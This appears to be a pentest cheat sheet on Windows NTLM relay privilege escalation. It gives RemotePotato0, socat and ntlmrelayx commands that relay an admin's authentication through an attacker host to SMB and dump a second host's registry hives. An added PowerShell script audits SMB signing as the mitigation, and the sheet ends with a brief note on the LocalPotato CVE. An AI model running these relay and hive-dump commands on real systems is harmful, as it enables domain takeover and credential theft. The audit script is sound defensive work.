NTLM elevation of privilege

RemotePotato

Windows privilege escalation from a standard user to Domain Admin via NTLM relay.

Relay NetNTLMv2 to SMB

Very effective on, e.g., a terminal server where local admins or domain admins are logged on.

On the target system:

RemotePotato0.exe -m 2 -r <ATTACKER-IP> -x <ATTACKER-IP> -s <SESSION-ID> -c <CLSID DEPENDING ON OS>
  • e.g. CLSID: 5167B42F-C111-47A1-ACC4-8EABE61B0B54

On attacker system:

socat TCP-LISTEN:135,fork,reuseaddr TCP:<TARGET-IP>:9999

Relaying NTLM to SMB to dump the local hives of a second system on which the relayed user holds local admin privileges

On target system:

RemotePotato0.exe -m 0 -r <ATTACKER-IP> -x <ATTACKER-IP> -p 9999 -s <SESSION-ID> -c <CLSID>
  • e.g. CLSID: F8842F8E-DAFE-4B37-9D38-4E0714A61149

On attacker system:

socat TCP-LISTEN:135,fork,reuseaddr TCP:<TARGET-IP>:9999
ntlmrelayx.py -t <SECOND-TARGET-IP> -smb2support
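Both relay scenarios above only work when the receiving SMB service accepts unsigned sessions. The following PowerShell audit is an added example, not part of the original notes or the RemotePotato0 project: it reports whether a Windows host requires SMB signing, which is the control that breaks an NTLM relay to SMB, and prints the remediation when it does not. It assumes the built-in SmbShare cmdlets are available and runs in an elevated session.

```powershell
# Added example (not from the original page): audit SMB signing enforcement,
# the mitigation for the "relay NetNTLMv2 to SMB" step described above.
# Run in an elevated PowerShell session on the host being checked.

function Get-SmbSigningPosture {
    $server = Get-SmbServerConfiguration
    $client = Get-SmbClientConfiguration

    # Same server-side setting read from the registry, as a cross-check
    # (value is absent when the policy was never set explicitly).
    $lanman = Get-ItemProperty `
        -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' `
        -ErrorAction SilentlyContinue

    [pscustomobject]@{
        ComputerName              = $env:COMPUTERNAME
        ServerRequiresSigning     = $server.RequireSecuritySignature
        ServerEnablesSigning      = $server.EnableSecuritySignature
        ClientRequiresSigning     = $client.RequireSecuritySignature
        LanmanServerRegistryValue = $lanman.RequireSecuritySignature
        # Only the server-side "require" setting actually stops a relayed,
        # unsigned session from being accepted by this host.
        RelayToSmbMitigated       = [bool]$server.RequireSecuritySignature
    }
}

$posture = Get-SmbSigningPosture
$posture | Format-List

if (-not $posture.RelayToSmbMitigated) {
    Write-Warning ("SMB signing is not required on {0}; a relayed NTLM " +
                   "authentication to this host's SMB service would be accepted.") -f $posture.ComputerName
    Write-Host 'Remediation: Set-SmbServerConfiguration -RequireSecuritySignature $true -Force'
}
```

Run it on every host that could be named as SECOND-TARGET-IP above; a host with ServerRequiresSigning = False is the one the relay would land on.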

LocalPotato

CVE-2023-21746: Microsoft Windows could allow a local authenticated attacker to gain elevated privileges on the system because of a flaw in the NTLM component. By executing a specially crafted program, an authenticated attacker could exploit this vulnerability to obtain SYSTEM privileges.
